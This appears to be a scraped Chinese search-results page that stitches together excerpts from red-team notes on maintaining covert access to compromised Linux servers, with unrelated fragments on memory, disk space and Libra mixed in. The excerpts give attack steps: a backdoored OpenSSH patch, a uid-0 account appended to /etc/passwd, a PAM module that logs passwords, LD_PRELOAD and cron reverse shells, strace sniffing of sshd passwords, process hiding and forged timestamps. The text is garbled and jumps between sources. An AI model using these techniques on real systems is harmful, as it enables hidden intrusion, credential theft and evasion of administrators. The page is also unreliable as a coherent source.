后门补丁包,解压后,将后门补丁文件sshbd5.9p1.diff打入openssh5.9本体中: 修改inlucde.h中的SECRETPW参数: 配置安装路径和编译安装: 靶机版本为kali linux
本文为免杀三期学员笔记:https://www.cnblogs.com/Night-Tac/articles/16941099.html
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
因此需要进行权限维持,隐藏后门。本文将对Linux下常见的权限维持后门技术进行解析,知己知彼百战不殆。...echo "backdoor:AALvujjdsfdsf:0:0:me:/root:/bin/bash">>/etc/passwd #Aalv…为第一行命令执行结果 2.设置suid权限位 原理:设置了suid...(不通操作系统文件不同) 4.写入SSH公钥 原理:Linux主机打开了SSH时默认也开启了密钥登陆,故写入ssh公钥,即可留下一条控制系统的路 ssh-keygen -t rsa #生成ssh密钥对...则会修改目录下root文件,也相当于crontab -e 还有许多其它执行计划任务的文件及相关文件 11.预加载动态链接库 原理:系统执行一些命令的时候,在真正执行其文件之前,会加载相应的动态链接库,但linux...提供了一个可以加载自定义动态链接库的方式,并且比加载正常动态链接库更早,故可以利用此特点设置自定义加载恶意动态链接库。
更新时间:2022年12月06日11:43:20 目的 本文主要是学习linux下的权限维持的方法,本文因为写的时间很久了,文章有点乱。...本文仅对linux的权限维持做了非常微小的学习,文中会从攻和防的角度,在借助学习其它文章的前提下进行学习。 文章所有的操作都是网上已有的技术,仅供参考,如有错误,欢迎指正。 1....cat etc/pam.d/su image.png 1.PAM认证机制,若sshd服务中开启了PAM认证机制(默认开启),当程序执行时,PAM模块则会搜寻PAM相关设定文件,设定文件一般是在/etc...h%m%s'`.log -s 2048 su' # source下.bashrc文件 source /root/.bashrc 注意文件不要放在其他的高权限文件夹下,否则生成文件的时候会提示权限不足...3.总结 本文仅对linux的权限维持做了非常微小的学习,文章所有的操作都是网上已有的技术,仅供参考,如有错误,欢迎指正。 4.参考资料 其中还有一部分参考的文章链接在文中。
0x03 隐藏权限 0x04 隐藏历史操作命令 技巧一:只针对你的工作关闭历史记录 技巧二:从历史记录中删除指定的命令 0x05 进程隐藏 第一种方法:libprocesshider 0x01 隐藏文件 Linux...下创建一个隐藏文件:touch .test.txt touch 命令可以创建一个文件,文件名前面加一个 点 就代表是隐藏文件 一般的Linux下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件夹...,查看Linux下的隐藏文件需要用到命令:ls -al 这里,我们可以看到在/tmp下,默认存在多个隐藏目录,这些目录是恶意文件常用来藏身的地方。....Test-unix/、/temp/.X11-unix/、/temp/.XIM-unix/ 0x02 隐藏文件时间戳 Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用 touch 就可以了。...比如参考 1.php 的时间,再赋给 2.php,结果两个文件的时间就一样了。 利用方法 touch -r 1.php 2.php 或者直接将时间戳修改成某年某月某日。
有趣的 LD_PRELOAD 前言 LD_PRELOAD 是 Linux 系统中的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库...LD_PRELOAD LD_PRELOAD 是 Linux 系统中的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。...了: image-20210917151915074 此时我们便成功劫持了原程序 passcheck 中的 strcmp 函数。...利用这种思路,我们可以制作一个隐藏得 Linux 后门,比如当管理员执行 ls 命令时会反弹一个 Shell: •hook_strncmp.c #include#include<stdio.h...这样,我们就不用局限于仅劫持某一函数,而应考虑劫持动态链接库了,也可以说是劫持了一个新进程。
本文将对Linux下常见的权限维持技术进行解析,知己知彼百战不殆。...相关文章:Linux下的几种隐藏技术 ---- 1、一句话添加用户和密码 添加普通用户: # 创建一个用户名guest,密码123456的普通用户useradd -p `openssl passwd...排查技巧: # 在Linux中查找SUID设置的文件find . -perm /4000# 在Linux中查找使用SGID设置的文件find ....这个子进程,没有什么检验,而是直接执行系统默认的位置的/usr/sbin/sshd,这样子控制权又回到脚本了。...PAM最初是集成在Solaris中,目前已移植到其它系统中,如Linux、SunOS、HP-UX 9.0等。
Linux权限维持|内网渗透学习(十二) 都是一些偷袭留后门的小技巧, 有哪些内容的话看目录吧 SSH 后门 软链接sshd 输入任意密码就可以root用户权限登陆﹐如果root用户被禁止登陆时﹐可以利用其他存在的用户身份登陆...这个子进程没有什么检验, 而是直接执行系统默认的位置的/usr/sbin/sshd, 这样子控制权又回到脚本了, 此时子进程标准输入输出已被重定向到套接字getpeername能真的获取到客户端的TCP...在输入密码的时候, 不论正确错误都会被记录到log文件中, 从而获取管理员的更多账号密码 ssh隐身登录 查看登录状态和记录 w 记录着当前打开的连接的状态 who 记录着当前有哪些用户登录在线了的...target_ip /bin/bash -i ssh -o UserKnownHostsFile=/dev/null -T root@target_ip 通过上面两种命令方式登录是不会被记录的从而实现隐身登录 Linux...我们只要nc连接端口即可获得shell 开启一个体验更好的虚拟终端: python -c "import pty;pty.spawn('/bin/bash')" PROMPT_COMMAND 后门 Linux
Linux操作系统后门 alias alias 命令可以设置别名 执行 ll 相当于执行 ls -l alias ll=ls -l ssh 后门设计 在管理员使用 ssh 时生效,后门将输入的 ssh.../library/ wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz tar -xzvf Linux-PAM-1.1.8.tar.gz.../Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c ?...替换原有 PAM 模块,添加后门 cd Linux-PAM-1.1.8 编译 PAM 源码 ..../configure && make 备份原有 PAM 模块 mv /lib/x86_64-linux-gnu/security/pam_unix.so /lib/x86_64-linux-gnu/security
0x00 前言 攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术。...一般的Linux下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件夹,查看Linux下的隐藏文件需要用到命令:ls -al 这里,我们可以看到在/tmp下,默认存在多个隐藏目录,这些目录是恶意文件常用来藏身的地方...这个工具在Linux,UNIX类,MS-Windows等操作系统下都可以工作。...第二种方法:进程注入工具linux-inject linux-inject是用于将共享对象注入Linux进程的工具 github项目地址: https://github.com/gaffe23/linux-inject.git...# 下载程序编译git clone https://github.com/gaffe23/linux-inject.gitcd linux-inject && make# 测试进程.
简介 前一段时间,朋友问了一个这样的问题:Linux 普通权限,没有crontab 之类的,如何做权限维持。...我之前介绍过好多好多种 Linux 权限维持的方法,大多数还是基于 root 权限的,如果不提权的话,有些手法还是受限的,比如 motd,服务之类的。...,等待一段时间就会出现 虽然此时可以 ctrl + c 来中断,但是这样也就直接将后门暴漏给被攻击者了,所以我们之前介绍去的方法中都是通过 python fork() 来解决的 说到底,我们就是希望,...我们的程序和登录本身并行执行,那我们新创建一个进程就好了,于是有了下面常规的操作 常规的操作 使用 python3 的 fork import os,socket,subprocess; ret =...配置好监听,重新登录试试 可以看到这个也可以成功反弹 shell,那么如果我们不配置监听,看看登录会不会卡住 可以看到,登录没有卡住,和正常登录没有区别 其实呢,这也是我埋在 alias后门 | Linux
大家好,又见面了,我是你们的朋友全栈君。...因为服务器的内存是2g的,所以就怀疑是内存不够了,所导致 开始排查 ps -ef|grep tomcat 显示tomcat已经不在运行了 free -m 查看内存,当时那台机器free,只有77了,...这张图是后在自己电脑上截的 grep "Out of memory" /var/log/messages 查看系统日志,显示内存不足,杀死了一个java进程,可以推测,就是tomcat惨遭了毒手,...这是由于Linux 内核有个机制叫OOM killer(Out Of Memory killer),,当系统内存不足的时候,out_of_memory()被触发,然后调用select_bad_process...linux选择”bad”进程是通过调用oom_badness(),挑选的算法和想法都很简单很朴实:最bad的那个进程就是那个最占用内存的进程。
工具介绍 通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者...] 查看下面的表格可以知道生成的权限维持文件可以运行的python版本,但是这个项目本身是python3运行的[我自己的环境是Python 3.9.7] 权限的划分 快速使用 python3运行此项目...[我自己的环境是Python 3.9.7],但是运行权限维持模块脚本请看上面的表格 安装依赖 pip install -r requirements.txt 快速判断目标机器适合的权限维持模块,运行...python main.py -c 1 查看权限维持模详细块信息 python main.py -c 2 使用此项目生成权限维持脚本[在这之前,请先运行check.py脚本判断出目标机器适合什么类型权限维持的脚本...video/BV1fV411N7Qc/ 常见后门介绍 OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用 发现程度:|| PAM后门,PAM是一个Linux
*本文原创作者:sysorem 维持访问 在获得了目标系统的访问权之后,攻击者需要进一步维持这一访问权限。使用木马程序、后门程序和rootkit来达到这一目的。...维持访问是一种艺术形式,思想比渗透更加重要。...Cryptcat用法基本和NC相近,不过多介绍了。 ?...weevely weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于...当然那些在下面挺我的小伙伴 我也非常感谢大家Y(^_^)Y有个好消息就是这是最后一篇了,我也不会再写也懒得再写这种东西了,说真的一个月前熬夜写这个也是一脸蒙蔽—+二脸蒙球的 某云现在不能愉快的玩耍了,
Swap 是 Linux 下的交换分区,类似 Windows 的虚拟内存,当物理内存不足时,系统可把一些内存中不常用到的程序放入 Swap,解决物理内存不足的情况。
权限维持-Linux-替换版本-OpenSSH后门 这里复现也真是奇怪,在靶机上没复现成功,在服务器上复现成功了 原理:替换本身操作系统的ssh协议支撑软件openssh,重新安装自定义的openssh...权限维持-Linux-更改验证-SSH-PAM后门 参考:https://xz.aliyun.com/t/7902 PAM是一种认证模块,PAM可以作为Linux登录验证和各类基础服务的认证,简单来说就是一种用于...Linux系统上的用户身份验证的机制。...配置环境 关闭 selinux setenforce 0 查询版本 rpm -qa | grep pam wget http://www.linux-pam.org/library/Linux-PAM-...SSH配置中开启了PAM进行身份验证 查看是否使用PAM进行身份验证: cat /etc/ssh/sshd_config|grep UsePAM ln -sf /usr/sbin/sshd /tmp/
导读:6月18日,Facebook位于瑞士的子公司Libra Network(天秤座网络)联合全球26家企业,万众瞩目之下发布了其数字货币项目Libra的白皮书。Libra计划在2020年正式上线。...本书主要面向程序员,书中详细介绍了加密货币的原理、使用方法,以及如何开发与之相关的软件。对希望理解比特币及加密货币内在工作机制的非程序员读者们,本书前几章还深入介绍了比特币概念及其原理。 2 ? ?...本书耗时2年,作者深入研究了中国、美国、日本、韩国、新加坡、泰国等十几个国家的区块链监管政策,并对这些国家的几十家区块链企业进行了深入调研,科学而翔实。 4 ? ?
权限维持-Linux-定时任务-Cron后门 利用系统的定时任务功能进行反弹Shell 1、编辑后门反弹 vim /etc/.backshell.sh #!...crontab */1 * * * * root /etc/.backshell.sh 成功反弹shell 配合挖矿木马病毒,自动挖矿,很多未授权redis数据库很多都被写入了挖矿程序 权限维持...-Linux-监控功能-Strace后门 strace是一个动态跟踪工具,它可以跟踪系统调用的执行。...trace=read,write -s 32 2> /tmp/.sshd.log &) grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log 唯一的不足就是.../etc/upload fi 权限维持-Linux-内核加载LKM-Rootkit后门 传统后门通过TCP连接,容易被发现 现在常用的linux维持权限的方法大多用crontab和开机自启动,
linux使用--根目录空间不足,追加空间到根目录下 最近在爬虫,要保存大量的源码在linux上,最后发现根目录不足,想要追加根目录的空间,我的系统是centos7,还好之前分配了一整个系统盘给centos...查看分区的状态: 敲入命令:df -h ,然后可以看到我现在的根目录没剩多少空间了,home的空间比较充足,我们给他分过来一些。 ?
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
即时通信 IM
对象存储
